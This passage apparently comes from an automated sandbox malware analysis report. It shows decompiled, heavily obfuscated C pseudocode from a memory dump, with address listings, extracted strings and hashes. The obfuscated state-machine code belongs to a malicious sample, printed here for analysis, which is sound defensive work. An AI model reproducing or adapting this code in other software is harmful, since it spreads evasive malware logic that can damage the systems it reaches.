				_v184 = _v184 + 0xffff5aea;
				_v184 = _v184 ^ 0x0621037b;
				_v184 = _v184 + 0xffff0635;
				_v184 = _v184 ^ 0x06c19238;
				_v36 = 0xa8ef7f;
				_v36 = _v36 + 0xffff4107;
				_v36 = _v36 ^ 0x00ab8625;
				_v44 = 0xa6062e;
				_v44 = _v44 << 0xd;
				_v44 = _v44 ^ 0xc0ced932;
				_v180 = 0x5e49fc;
				_v180 = _v180 + 0x375b;
				_v180 = _v180 << 2;
				_t474 = 0x74;
				_v180 = _v180 * 0x1c;
				_v180 = _v180 ^ 0x2957b537;
				_v164 = 0x531cb2;
				_v164 = _v164 << 0xf;
				_v164 = _v164 ^ 0x1fcb8a78;
				_v164 = _v164 / _t474;
				_v164 = _v164 ^ 0x014b6a45;
				_v64 = 0x492d9e;
				_v64 = _v64 ^ 0x2124760e;
				_v64 = _v64 ^ 0x216a5ba9;
				_v132 = 0x711783;
				_v132 = _v132 | 0x71acd4bd;
				_v132 = _v132 + 0x97cf;
				_v132 = _v132 ^ 0x71fa50e2;
				_v152 = 0xb0a3b1;
				_v152 = _v152 ^ 0xa6c9b18c;
				_t475 = 0x5e;
				_v152 = _v152 / _t475;
				_v152 = _v152 / _t475;
				_v152 = _v152 ^ 0x0003c09f;
				_v136 = 0xe5fa51;
				_v136 = _v136 + 0xde7e;
				_v136 = _v136 + 0xffffe7ef;
				_v136 = _v136 ^ 0x00ec445b;
				_t519 = _v12;
				while(1) {
					L1:
					_t442 = _v144;
					while(1) {
						L2:
						while(1) {
							L3:
							_t476 = _v160;
							while(1) {
								L4:
								_t531 = _t522 - 0x93283d2;
								if(_t531 > 0) {
									break;
								}
								if(_t531 == 0) {
									return E00882B09(_v132, _t464, _v152, _v136);
								}
								if(_t522 == 0x6c245) {
									_push( &_v12);
									_push(_t464);
									_push(_t476);
									_push(_v68);
									_push(_v172);
									_push(_v120);
									_push(_v80);
									_push(_t476);
									_push(_v196);
									_push(_t476);
									_push(_v112);
									_push(_v88);
									_push(_v16);
									_t450 = E0086FA95( &_v8, _v24);
									_t528 = _t528 - 0xc + 0x40;
									if(_t450 == 0) {
										L25:
										_t522 = 0x635125b;
										while(1) {
											L1:
											_t442 = _v144;
											goto L2;
										}
									} else {
										_t452 = E0086DC1B( &_v8);
										_t522 = 0x4f2b403;
										_t442 = _v12 * 0x2c + _t464;
										_v144 = _t442;
										_t519 =  >=  ? _t464 : (_t452 & 0x0000001f) * 0x2c + _t464;
										goto L2;
									}
									L34:
								} else {
									if(_t522 == 0x4f2b403) {
										_t476 = E0086EE62(_v148, _v16, _v48, _v20, _v128, _v56,  *_t519);
										_t528 =  &(_t528[5]);
										_t442 = _v144;
										_v160 = _t476;
										_t511 = 0xe34a72e;
										_t522 =  !=  ? 0xe34a72e : 0xced26bb;
										continue;
									} else {
										if(_t522 == 0x635125b) {
											E00882B09(_v180, _t526, _v164, _v64);
											_t522 = 0x93283d2;
											while(1) {
												L1:
												_t442 = _v144;
												goto L2;
											}
										} else {
											if(_t522 == 0x63dbfd2) {
												_t522 = 0x8a8e175;
												continue;
											} else {
												if(_t522 != 0x8a8e175) {
													L30:
													if(_t522 != 0xfb7e38f) {
														_t442 = _v144;
														goto L3;
													}
												} else {
													_push(_t476);
													_push(_t476);
													_t442 = E0086C5D8(0x20000);
													_t464 = _t442;
													_t528 =  &(_t528[3]);
													if(_t464 != 0) {
														_t522 = 0x965da6a;
														while(1) {
															L1:
															_t442 = _v144;
															L2:
															L3:
															_t476 = _v160;
															goto L4;
														}
													}
												}
											}
										}
									}
								}
								L33:
								return _t442;
								goto L34;
							}
							if(_t522 == 0x965da6a) {
								_push(_t476);
								_push(_t476);
								_t442 = E0086C5D8(0x2000);
								_t526 = _t442;
								_t528 =  &(_t528[3]);
								if(_t442 == 0) {
									_t522 = 0x93283d2;
									goto L29;
								} else {
									_t522 = 0x6c245;
									goto L1;
								}
							} else {
								if(_t522 == 0xbf0ab43) {
									E0086C3A7(_v100, _a8, _v108, _v184, _t526, _v36, _v44);
									_t528 =  &(_t528[5]);
									goto L25;
								} else {
									if(_t522 == 0xced26bb) {
										_t519 = _t519 + 0x2c;
										asm("sbb esi, esi");
										_t522 = (_t522 & 0xfebda1a8) + 0x635125b;
										goto L4;
									} else {
										if(_t522 == _t511) {
											E0087FD4E(_v124, _v140, _v32, _v28,  &_v4, _v72, _t476, _v104, _t526);
											_t522 =  !=  ? 0xbf0ab43 : 0xced26bb;
											_t442 = E00863046(_v52, _v192, _v60, _v160, _v116);
											_t528 =  &(_t528[0xb]);
											L29:
											_t511 = 0xe34a72e;
										}
										goto L30;
									}
								}
							}
							goto L33;
						}
					}
				}
			}

0x0087b261
0x0087b26a
0x0087b271
0x0087b278
0x0087b279
0x0087b27a
0x0087b27f
0x0087b287
0x0087b28a
0x0087b294
0x0087b29c
0x0087b29e
0x0087b2a6
0x0087b2a8
0x0087b2b0
0x0087b2b5
0x0087b2ba
0x0087b2bf
0x0087b2c4
0x0087b2d9
0x0087b2dc
0x0087b2e3
0x0087b2ee
0x0087b2fb
0x0087b2ff
0x0087b307
0x0087b30f
0x0087b317
0x0087b31f
0x0087b324
0x0087b32c
0x0087b334
0x0087b33c
0x0087b352
0x0087b359
0x0087b364
0x0087b36f
0x0087b377
0x0087b37c
0x0087b384
0x0087b38c
0x0087b394
0x0087b399
0x0087b3a5
0x0087b3a8
0x0087b3ac
0x0087b3b4
0x0087b3bf
0x0087b3ca
0x0087b3d5
0x0087b3e0
0x0087b3e8
0x0087b3f0
0x0087b3f8
0x0087b400
0x0087b40d
0x0087b411
0x0087b419
0x0087b421
0x0087b429
0x0087b434
0x0087b43f
0x0087b44a
0x0087b452
0x0087b457
0x0087b45f
0x0087b469
0x0087b471
0x0087b479
0x0087b481
0x0087b489
0x0087b497
0x0087b49c
0x0087b4a2
0x0087b4af
0x0087b4b2
0x0087b4b6
0x0087b4be
0x0087b4c9
0x0087b4dc
0x0087b4e3
0x0087b4ee
0x0087b4f6
0x0087b4fb
0x0087b503
0x0087b50b
0x0087b513
0x0087b518
0x0087b51c
0x0087b524
0x0087b528
0x0087b52d
0x0087b535
0x0087b540
0x0087b54b
0x0087b553
0x0087b55e
0x0087b569
0x0087b571
0x0087b57c
0x0087b584
0x0087b58e
0x0087b591
0x0087b595
0x0087b59d
0x0087b5a5
0x0087b5b0
0x0087b5bb
0x0087b5c6
0x0087b5d9
0x0087b5e0
0x0087b5eb
0x0087b5fb
0x0087b5ff
0x0087b607
0x0087b60f
0x0087b61b
0x0087b61e
0x0087b627
0x0087b62b
0x0087b633
0x0087b63b
0x0087b640
0x0087b648
0x0087b650
0x0087b65b
0x0087b663
0x0087b670
0x0087b67b
0x0087b683
0x0087b68e
0x0087b6a3
0x0087b6a6
0x0087b6ad
0x0087b6b8
0x0087b6c3
0x0087b6d9
0x0087b6e0
0x0087b6eb
0x0087b6f3
0x0087b6fb
0x0087b704
0x0087b709
0x0087b70f
0x0087b717
0x0087b722
0x0087b72d
0x0087b738
0x0087b740
0x0087b745
0x0087b74d
0x0087b755
0x0087b75d
0x0087b762
0x0087b76a
0x0087b772
0x0087b77a
0x0087b782
0x0087b78a
0x0087b792
0x0087b79a
0x0087b7a5
0x0087b7b0
0x0087b7bb
0x0087b7c6
0x0087b7ce
0x0087b7d9
0x0087b7e1
0x0087b7e9
0x0087b7f3
0x0087b7f6
0x0087b7fa
0x0087b802
0x0087b80a
0x0087b80f
0x0087b81f
0x0087b823
0x0087b82b
0x0087b836
0x0087b841
0x0087b84c
0x0087b854
0x0087b85c
0x0087b864
0x0087b86c
0x0087b874
0x0087b880
0x0087b883
0x0087b88f
0x0087b893
0x0087b89b
0x0087b8a3
0x0087b8ab
0x0087b8b3
0x0087b8bb
0x0087b8c2
0x0087b8c2
0x0087b8c2
0x0087b8c6
0x0087b8c6
0x0087b8cb
0x0087b8cb
0x0087b8cb
0x0087b8cf
0x0087b8cf
0x0087b8cf
0x0087b8d5
0x00000000
0x00000000
0x0087b8db
0x00000000
0x0087bb8a
0x0087b8e7
0x0087b9c3
0x0087b9c4
0x0087b9c5
0x0087b9c6
0x0087b9cd
0x0087b9d1
0x0087b9d5
0x0087b9dc
0x0087b9dd
0x0087b9e1
0x0087b9e2
0x0087b9f3
0x0087ba01
0x0087ba08
0x0087ba0d
0x0087ba12
0x0087bb1f
0x0087bb1f
0x0087b8c2
0x0087b8c2
0x0087b8c2
0x00000000
0x0087b8c2
0x0087ba18
0x0087ba1f
0x0087ba27
0x0087ba39
0x0087ba3d
0x0087ba41
0x00000000
0x0087ba41
0x00000000
0x0087b8ed
0x0087b8f3
0x0087b99b
0x0087b99d
0x0087b9a0
0x0087b9ab
0x0087b9af
0x0087b9b4
0x00000000
0x0087b8f5
0x0087b8fb
0x0087b95f
0x0087b966
0x0087b8c2
0x0087b8c2
0x0087b8c2
0x00000000
0x0087b8c2
0x0087b8fd
0x0087b903
0x0087b947
0x00000000
0x0087b905
0x0087b90b
0x0087bb65
0x0087bb6b
0x0087bb6d
0x00000000
0x0087bb6d
0x0087b911
0x0087b924
0x0087b925
0x0087b92b
0x0087b930
0x0087b932
0x0087b937
0x0087b93d
0x0087b8c2
0x0087b8c2
0x0087b8c2
0x0087b8c6
0x0087b8cb
0x0087b8cb
0x00000000
0x0087b8cb
0x0087b8c2
0x0087b937
0x0087b90b
0x0087b903
0x0087b8fb
0x0087b8f3
0x0087bb95
0x0087bb95
0x00000000
0x0087bb95
0x0087ba4f
0x0087bb3c
0x0087bb3d
0x0087bb43
0x0087bb48
0x0087bb4a
0x0087bb4f
0x0087bb5b
0x00000000
0x0087bb51
0x0087bb51
0x00000000
0x0087bb51
0x0087ba55
0x0087ba5b
0x0087bb17
0x0087bb1c
0x00000000
0x0087ba61
0x0087ba67
0x0087bada
0x0087badf
0x0087bae7
0x00000000
0x0087ba69
0x0087ba6b
0x0087ba9c
0x0087bac3
0x0087bacd
0x0087bad2
0x0087bb60
0x0087bb60
0x0087bb60
0x00000000
0x0087ba6b
0x0087ba67
0x0087ba5b
0x00000000
0x0087ba4f
0x0087b8cb
0x0087b8c6

Strings

{u, xrefs: 0087B4A2
B, xrefs: 0087B6B8
&-, xrefs: 0087B3E0
E!, xrefs: 0087B6F3
bu, xrefs: 0087B6E0
s4, xrefs: 0087B513
[7, xrefs: 0087B7E1
+V, xrefs: 0087B457
[D, xrefs: 0087B8B3

Memory Dump Source

Source File: 00000000.00000002.703048375.0000000000861000.00000020.00000001.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.703041906.0000000000860000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.703166511.0000000000886000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_860000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID: s4$&-$+V$E!$[7$[D$bu${u$B
API String ID: 0-2389712741
Opcode ID: ef6ac798c9392941f1a0e429090c8fbff63c34f89c27df27b1f91d65bd96e706
Instruction ID: ed4ad5a96aa86f7dd780979e22be3eefa806de82f9ef64020a896de32d60c8f0
Opcode Fuzzy Hash: ef6ac798c9392941f1a0e429090c8fbff63c34f89c27df27b1f91d65bd96e706
Instruction Fuzzy Hash: C5222472509380DFD368CF25C98AA5BBBE2FBC4318F10891DE5D996260D7B19949CF03

Uniqueness

Uniqueness Score: -1.00%

Function 0086C6B8, Relevance: 11.7, Strings: 9, Instructions: 423
COMMONCrypto

Download Yara Rule

C-Code - Quality: 95%

			E0086C6B8() {
				char _v520;
				char _v1040;
				char _v1560;
				char _v1564;
				signed int _v1568;
				signed int _v1572;
				signed int _v1576;
				signed int _v1580;
				signed int _v1584;
				signed int _v1588;
				signed int _v1592;
				signed int _v1596;
				signed int _v1600;
				signed int _v1604;
				signed int _v1608;
				signed int _v1612;
				signed int _v1616;
				signed int _v1620;
				signed int _v1624;
				signed int _v1628;
				signed int _v1632;
				signed int _v1636;
				signed int _v1640;
				signed int _v1644;
				signed int _v1648;
				signed int _v1652;
				signed int _v1656;
				signed int _v1660;
				signed int _v1664;
				signed int _v1668;
				signed int _v1672;
				signed int _v1676;
				signed int _v1680;
				signed int _v1684;
				signed int _v1688;
				signed int _v1692;
				signed int _v1696;
				signed int _v1700;
				signed int _v1704;
				signed int _v1708;
				signed int _v1712;
				signed int _v1716;
				signed int _v1720;
				signed int _v1724;
				signed int _v1728;
				signed int _v1732;
				signed int _v1736;
				signed int _v1740;
				signed int _v1744;
				signed int _v1748;
				signed int _v1752;
				signed int _v1756;
				signed int _v1760;
				signed int _v1764;
				void* _t478;
				void* _t479;
				intOrPtr _t482;
				intOrPtr _t486;
				signed int _t494;
				intOrPtr* _t497;
				signed int _t501;
				intOrPtr _t502;
				intOrPtr* _t503;
				signed int _t504;
				signed int _t505;
				signed int _t506;
				signed int _t507;
				signed int _t508;
				signed int _t509;
				signed int _t510;
				signed int _t511;
				signed int _t512;
				void* _t513;
				void* _t522;
				void* _t562;
				signed int _t564;
				signed int* _t568;

				_t568 =  &_v1764;
				_v1588 = 0x57daab;
				_v1588 = _v1588 + 0x535a;
				_v1588 = _v1588 ^ 0x00582e2c;
				_v1756 = 0x11011b;
				_v1756 = _v1756 | 0x986fcb94;
				_v1756 = _v1756 + 0xffff0812;
				_v1756 = _v1756 | 0x2bc6aa33;
				_v1756 = _v1756 ^ 0x3bfefbb2;
				_v1652 = 0x5adeab;
				_v1652 = _v1652 + 0xffff93f0;
				_v1652 = _v1652 ^ 0xbf2e951e;
				_v1652 = _v1652 ^ 0xbf74e787;
				_v1668 = 0x1eca4f;
				_v1668 = _v1668 + 0x52c;
				_v1568 = 0;
				_v1668 = _v1668 * 0xb;
				_t562 = 0xbc1c7ad;
				_v1668 = _v1668 ^ 0x0152ea48;
				_v1584 = 0x89d737;
				_v1584 = _v1584 + 0xffff9374;
				_v1584 = _v1584 ^ 0x0082a8e0;
				_v1672 = 0x7da8ac;
				_v1672 = _v1672 >> 0xf;
				_v1672 = _v1672 | 0x438c492a;
				_v1672 = _v1672 ^ 0x438e7d89;
				_v1636 = 0xa2c3bd;
				_v1636 = _v1636 << 3;
				_v1636 = _v1636 ^ 0x051ae408;
				_v1720 = 0x328717;
				_v1720 = _v1720 << 0xc;
				_v1720 = _v1720 << 0xd;
				_v1720 = _v1720 + 0x9e9a;
				_v1720 = _v1720 ^ 0x2e0b4663;
				_v1760 = 0x4b7b55;
				_t57 =  &_v1760; // 0x4b7b55
				_t504 = 0x6f;
				_v1760 =  *_t57 / _t504;
				_v1760 = _v1760 >> 0xb;
				_t505 = 0x66;
				_t564 = 6;
				_push("true");
				_v1760 = _v1760 * 0x46;
				_v1760 = _v1760 ^ 0x00015e15;
				_v1740 = 0xf42b27;
				_v1740 = _v1740 / _t505;
				_pop(_t506);
				_v1740 = _v1740 * 0x3b;
				_v1740 = _v1740 / _t564;
				_v1740 = _v1740 ^ 0x00118050;
				_v1680 = 0x69fb04;
				_v1680 = _v1680 / _t506;
				_v1680 = _v1680 + 0x2a45;
				_v1680 = _v1680 ^ 0x000477f2;
				_v1624 = 0xeefab1;
				_v1624 = _v1624 << 0xb;
				_v1624 = _v1624 ^ 0x77d908fd;
				_v1688 = 0x983026;
				_v1688 = _v1688 ^ 0xf9038374;
				_v1688 = _v1688 << 1;
				_v1688 = _v1688 ^ 0xf3384871;
				_v1656 = 0xbd9fd7;
				_v1656 = _v1656 | 0x34570662;
				_v1656 = _v1656 << 0xf;
				_v1656 = _v1656 ^ 0xcff19553;
				_v1724 = 0xb73e9;
				_v1724 = _v1724 + 0xffff2aba;
				_t507 = 0x1b;
				_v1724 = _v1724 * 0x2b;
				_v1724 = _v1724 + 0xffffc5c3;
				_v1724 = _v1724 ^ 0x01cec31d;
				_v1732 = 0xfb07a0;
				_v1732 = _v1732 + 0xfffff0a2;
				_v1732 = _v1732 ^ 0xe8e4881c;
				_v1732 = _v1732 + 0xfffffa8c;
				_v1732 = _v1732 ^ 0xe819b6c9;
				_v1664 = 0x98c4f6;
				_v1664 = _v1664 / _t507;
				_v1664 = _v1664 + 0xffffc9a9;
				_v1664 = _v1664 ^ 0x000722b9;
				_v1704 = 0x7b43f4;
				_v1704 = _v1704 + 0x33bf;
				_v1704 = _v1704 ^ 0xbdcd0236;
				_v1704 = _v1704 ^ 0xbdbcc173;
				_v1600 = 0x907d1c;
				_v1600 = _v1600 >> 0xa;
				_v1600 = _v1600 ^ 0x000f3001;
				_v1608 = 0x549b29;
				_v1608 = _v1608 + 0xffff560f;
				_v1608 = _v1608 ^ 0x005a0ce7;
				_v1648 = 0x53669a;
				_t508 = 0x60;
				_v1648 = _v1648 * 0x53;
				_v1648 = _v1648 * 0x2d;
				_v1648 = _v1648 ^ 0xc0c27601;
				_v1616 = 0xf6b3f;
				_v1616 = _v1616 << 0xf;
				_v1616 = _v1616 ^ 0xb591763f;
				_v1712 = 0xd11a2f;
				_v1712 = _v1712 >> 3;
				_v1712 = _v1712 + 0x34a7;
				_v1712 = _v1712 + 0xffffa6d8;
				_v1712 = _v1712 ^ 0x001715b5;
				_v1744 = 0x782a81;
				_v1744 = _v1744 >> 5;
				_v1744 = _v1744 >> 3;
				_v1744 = _v1744 * 0x57;
				_v1744 = _v1744 ^ 0x00239f7e;
				_v1728 = 0xdf27c0;
				_v1728 = _v1728 + 0xb655;
				_v1728 = _v1728 >> 0xf;
				_v1728 = _v1728 | 0x1084c50a;
				_v1728 = _v1728 ^ 0x10890bcf;
				_v1612 = 0xd31e5c;
				_v1612 = _v1612 / _t508;
				_v1612 = _v1612 ^ 0x000f28c0;
				_v1640 = 0xad59ab;
				_v1640 = _v1640 ^ 0x540bc483;
				_v1640 = _v1640 ^ 0x54aa6eab;
				_v1596 = 0xfc600e;
				_v1596 = _v1596 << 1;
				_v1596 = _v1596 ^ 0x01f16920;
				_v1676 = 0x70f7b6;
				_v1676 = _v1676 >> 1;
				_v1676 = _v1676 | 0x834faa8e;
				_v1676 = _v1676 ^ 0x837cfefc;
				_v1580 = 0xc67f49;
				_v1580 = _v1580 ^ 0x220388f4;
				_v1580 = _v1580 ^ 0x22cc2a29;
				_v1604 = 0xf53a42;
				_v1604 = _v1604 + 0x1d20;
				_v1604 = _v1604 ^ 0x00fba671;
				_v1764 = 0x3c20a1;
				_v1764 = _v1764 << 0xa;
				_v1764 = _v1764 | 0xcc5879dc;
				_v1764 = _v1764 + 0x7d87;
				_v1764 = _v1764 ^ 0xfcd01767;
				_v1736 = 0xfcd131;
				_v1736 = _v1736 | 0xb098ccc9;
				_v1736 = _v1736 + 0x1f04;
				_v1736 = _v1736 | 0xe0e1c446;
				_v1736 = _v1736 ^ 0xf0fbfa39;
				_v1684 = 0x6ca78a;
				_v1684 = _v1684 >> 0xd;
				_t509 = 0x5d;
				_v1684 = _v1684 / _t509;
				_v1684 = _v1684 ^ 0x00062aae;
				_v1576 = 0x28ea20;
				_t510 = 0x2d;
				_v1576 = _v1576 / _t510;
				_v1576 = _v1576 ^ 0x000e137d;
				_v1632 = 0x34444a;
				_v1632 = _v1632 + 0xb7da;
				_v1632 = _v1632 ^ 0x00330b1f;
				_v1748 = 0x707d69;
				_v1748 = _v1748 << 0xb;
				_v1748 = _v1748 ^ 0xb1536161;
				_v1748 = _v1748 + 0xffff04ff;
				_v1748 = _v1748 ^ 0x32b99598;
				_v1696 = 0x3e2d26;
				_v1696 = _v1696 + 0x9f8b;
				_v1696 = _v1696 + 0xf840;
				_v1696 = _v1696 ^ 0x00305f5f;
				_v1700 = 0x43ad40;
				_t511 = 0x7e;
				_v1700 = _v1700 / _t511;
				_v1700 = _v1700 + 0x17b0;
				_v1700 = _v1700 ^ 0x000023e6;
				_v1628 = 0x615af9;
				_v1628 = _v1628 | 0xc5f525fd;
				_v1628 = _v1628 ^ 0xc5f01915;
				_v1752 = 0xf7a5b1;
				_v1752 = _v1752 | 0xfe49737c;
				_v1752 = _v1752 + 0x9fc0;
				_v1752 = _v1752 ^ 0x9fa1c746;
				_v1752 = _v1752 ^ 0x60a54bb7;
				_v1572 = 0x7bbdbf;
				_t512 = 0xe;
				_v1572 = _v1572 * 0x2d;
				_v1572 = _v1572 ^ 0x15c0521a;
				_v1620 = 0xd84802;
				_v1620 = _v1620 ^ 0x3749a239;
				_v1620 = _v1620 ^ 0x37909643;
				_v1644 = 0xebc394;
				_v1644 = _v1644 << 8;
				_v1644 = _v1644 ^ 0xebca8902;
				_v1692 = 0x3d115c;
				_v1692 = _v1692 ^ 0xaeae6a77;
				_v1692 = _v1692 >> 0x10;
				_v1692 = _v1692 ^ 0x000f7307;
				_v1660 = 0x8a3dcc;
				_v1660 = _v1660 ^ 0x1263d9af;
				_v1660 = _v1660 / _t512;
				_v1660 = _v1660 ^ 0x015f4699;
				_v1592 = 0x64d88c;
				_v1592 = _v1592 ^ 0xc97cb881;
				_v1592 = _v1592 ^ 0xc91c2e76;
				_v1708 = 0x9c1e71;
				_v1708 = _v1708 ^ 0xd16e05af;
				_v1708 = _v1708 | 0x50445732;
				_v1708 = _v1708 << 5;
				_v1708 = _v1708 ^ 0x3ec99884;
				_v1716 = 0xd3e518;
				_v1716 = _v1716 + 0xffff72ee;
				_t501 = _v1568;
				_v1716 = _v1716 / _t564;
				_v1716 = _v1716 << 0xa;
				_v1716 = _v1716 ^ 0x8cea7ffc;
				while(1) {
					L1:
					_t513 = 0x5c;
					while(1) {
						L2:
						_t478 = 0x5243326;
						do {
							L3:
							if(_t562 == 0x22d4857) {
								_push(_v1688);
								_push(_v1624);
								_push(_v1680);
								_t479 = E0087E1F8(0x861030, _v1740, __eflags);
								E00867078( &_v520, __eflags);
								_t482 =  *0x886214; // 0x0
								_t486 =  *0x886214; // 0x0
								__eflags = _t486 + 0x34;
								E0086F96F(_v1656, _t486 + 0x34, _t486 + 0x34, _t479,  &_v520, _v1724,  &_v1560, _t482 + 0x23c, _v1732, _v1664, _v1704,  &_v1040);
								E0087FECB(_t479, _v1600, _v1608, _v1648, _v1616);
								_t568 =  &(_t568[0x10]);
								_t562 = 0x6f5d8c5;
								goto L19;
							} else {
								if(_t562 == 0x3a11f46) {
									_push(_v1612);
									_push(_v1728);
									_push(_v1744);
									__eflags = E00862DEA(_v1640,  &_v1564, _v1596, 0x8610a0, _v1756, _v1676, 0x8610a0, 0x8610a0, _v1580, _v1604, 0x8610a0, 0x8610a0, _v1652, _v1764, _v1736, _v1684, _v1576, E0087E1F8(0x8610a0, _v1712, __eflags));
									_t562 =  ==  ? 0x5243326 : 0xbc3e7f;
									E0087FECB(_t490, _v1632, _v1748, _v1696, _v1700);
									_t568 =  &(_t568[0x16]);
									L19:
									_t478 = 0x5243326;
									_t513 = 0x5c;
									goto L20;
								} else {
									if(_t562 == _t478) {
										_t494 = E008700C5( &_v1560, _v1628, _v1752);
										_pop(_t522);
										_t497 = E00872CD9(_v1572, _t501,  &_v1560, _t522, _v1564, _v1668, _v1620, 2 + _t494 * 2, _v1644, _v1692, _v1660);
										_t568 =  &(_t568[9]);
										__eflags = _t497;
										_t562 = 0xcd5a5d6;
										_v1568 = 0 | __eflags == 0x00000000;
										goto L1;
									} else {
										if(_t562 == 0x6f5d8c5) {
											_t502 =  *0x886214; // 0x0
											_t503 = _t502 + 0x23c;
											while(1) {
												__eflags =  *_t503 - _t513;
												if(__eflags == 0) {
													break;
												}
												_t503 = _t503 + 2;
												__eflags = _t503;
											}
											_t501 = _t503 + 2;
											_t562 = 0x3a11f46;
											goto L2;
										} else {
											if(_t562 == 0xbc1c7ad) {
												E00861A34(_v1584,  &_v1040, _t513, _t513, _v1672, _v1636, _v1720, _t513, _v1588, _v1760);
												_t568 =  &(_t568[8]);
												_t562 = 0x22d4857;
												while(1) {
													L1:
													_t513 = 0x5c;
													L2:
													_t478 = 0x5243326;
													goto L3;
												}
											} else {
												if(_t562 != 0xcd5a5d6) {
													goto L20;
												} else {
													E008653D0(_v1592, _v1708, _v1716, _v1564);
												}
											}
										}
									}
								}
							}
							L10:
							return _v1568;
							L20:
							__eflags = _t562 - 0xbc3e7f;
						} while (__eflags != 0);
						goto L10;
					}
				}
			}

0x0086c6b8
0x0086c6be
0x0086c6cb
0x0086c6d8
0x0086c6e3
0x0086c6eb
0x0086c6f3
0x0086c6fb
0x0086c703
0x0086c70b
0x0086c713
0x0086c71b
0x0086c723
0x0086c72b
0x0086c733
0x0086c73b
0x0086c74b
0x0086c74f
0x0086c754
0x0086c75c
0x0086c767
0x0086c772
0x0086c77d
0x0086c785
0x0086c78a
0x0086c792
0x0086c79a
0x0086c7a5
0x0086c7ad
0x0086c7b8
0x0086c7c0
0x0086c7c5
0x0086c7ca
0x0086c7d2
0x0086c7da
0x0086c7e2
0x0086c7e8
0x0086c7ed
0x0086c7f3
0x0086c7fd
0x0086c800
0x0086c801
0x0086c803
0x0086c807
0x0086c80f
0x0086c81f
0x0086c828
0x0086c829
0x0086c835
0x0086c839
0x0086c841
0x0086c84f
0x0086c853
0x0086c85b
0x0086c863
0x0086c86e
0x0086c876
0x0086c881
0x0086c889
0x0086c891
0x0086c895
0x0086c89f
0x0086c8a7
0x0086c8af
0x0086c8b4
0x0086c8bc
0x0086c8c4
0x0086c8d3
0x0086c8d6
0x0086c8da
0x0086c8e2
0x0086c8ea
0x0086c8f2
0x0086c8fa
0x0086c902
0x0086c90a
0x0086c912
0x0086c922
0x0086c926
0x0086c92e
0x0086c936
0x0086c93e
0x0086c946
0x0086c94e
0x0086c956
0x0086c961
0x0086c969
0x0086c974
0x0086c97f
0x0086c98a
0x0086c995
0x0086c9a8
0x0086c9a9
0x0086c9b8
0x0086c9bf
0x0086c9ca
0x0086c9d5
0x0086c9dd
0x0086c9e8
0x0086c9f0
0x0086c9f5
0x0086c9fd
0x0086ca05
0x0086ca0d
0x0086ca15
0x0086ca1a
0x0086ca24
0x0086ca28
0x0086ca30
0x0086ca38
0x0086ca40
0x0086ca45
0x0086ca4d
0x0086ca55
0x0086ca69
0x0086ca70
0x0086ca7b
0x0086ca86
0x0086ca91
0x0086ca9c
0x0086caa7
0x0086caae
0x0086cab9
0x0086cac1
0x0086cac5
0x0086cacd
0x0086cad5
0x0086cae0
0x0086caeb
0x0086caf6
0x0086cb03
0x0086cb0e
0x0086cb19
0x0086cb21
0x0086cb26
0x0086cb2e
0x0086cb36
0x0086cb3e
0x0086cb46
0x0086cb4e
0x0086cb56
0x0086cb5e
0x0086cb66
0x0086cb6e
0x0086cb79
0x0086cb7e
0x0086cb84
0x0086cb8c
0x0086cb9e
0x0086cba3
0x0086cbac
0x0086cbb7
0x0086cbc2
0x0086cbcd
0x0086cbd8
0x0086cbe0
0x0086cbe5
0x0086cbed
0x0086cbf5
0x0086cbfd
0x0086cc05
0x0086cc0d
0x0086cc15
0x0086cc1d
0x0086cc29
0x0086cc2e
0x0086cc34
0x0086cc3c
0x0086cc44
0x0086cc4f
0x0086cc5a
0x0086cc65
0x0086cc6d
0x0086cc75
0x0086cc7d
0x0086cc85
0x0086cc8d
0x0086cca0
0x0086cca1
0x0086cca8
0x0086ccb3
0x0086ccbe
0x0086ccc9
0x0086ccd4
0x0086ccdf
0x0086cce7
0x0086ccf2
0x0086ccfa
0x0086cd02
0x0086cd07
0x0086cd0f
0x0086cd17
0x0086cd25
0x0086cd29
0x0086cd33
0x0086cd43
0x0086cd4e
0x0086cd59
0x0086cd61
0x0086cd69
0x0086cd71
0x0086cd76
0x0086cd7e
0x0086cd86
0x0086cd94
0x0086cd9b
0x0086cd9f
0x0086cda4
0x0086cdac
0x0086cdac
0x0086cdae
0x0086cdaf
0x0086cdaf
0x0086cdaf
0x0086cdb4
0x0086cdb4
0x0086cdba
0x0086cfa1
0x0086cfaa
0x0086cfb1
0x0086cfb9
0x0086cfc7
0x0086cfe8
0x0086d00e
0x0086d013
0x0086d018
0x0086d03b
0x0086d040
0x0086d043
0x00000000
0x0086cdc0
0x0086cdc2
0x0086cef5
0x0086cf01
0x0086cf05
0x0086cf71
0x0086cf91
0x0086cf94
0x0086cf99
0x0086d048
0x0086d04a
0x0086d04f
0x00000000
0x0086cdc8
0x0086cdca
0x0086ce91
0x0086ce96
0x0086ced5
0x0086cedc
0x0086cedf
0x0086cee1
0x0086cee9
0x00000000
0x0086cdd0
0x0086cdd6
0x0086ce5f
0x0086ce65
0x0086ce70
0x0086ce70
0x0086ce73
0x00000000
0x00000000
0x0086ce6d
0x0086ce6d
0x0086ce6d
0x0086ce75
0x0086ce78
0x00000000
0x0086cddc
0x0086cde2
0x0086ce4d
0x0086ce52
0x0086ce55
0x0086cdac
0x0086cdac
0x0086cdae
0x0086cdaf
0x0086cdaf
0x00000000
0x0086cdaf
0x0086cde4
0x0086cdea
0x00000000
0x0086cdf0
0x0086ce06
0x0086ce0c
0x0086cdea
0x0086cde2
0x0086cdd6
0x0086cdca
0x0086cdc2
0x0086ce0d
0x0086ce1e
0x0086d050
0x0086d050
0x0086d050
0x00000000
0x0086d05c
0x0086cdaf

Strings

(, xrefs: 0086CB8C
U{K, xrefs: 0086C7E2
__0, xrefs: 0086CC15
,.X, xrefs: 0086C6D8
JD4, xrefs: 0086CBB7
i}p, xrefs: 0086CBD8
2WDP, xrefs: 0086CD69
#, xrefs: 0086CC3C
E*, xrefs: 0086C853

Memory Dump Source

Source File: 00000000.00000002.703048375.0000000000861000.00000020.00000001.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.703041906.0000000000860000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.703166511.0000000000886000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_860000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID: ($,.X$2WDP$E*$JD4$U{K$__0$i}p$#
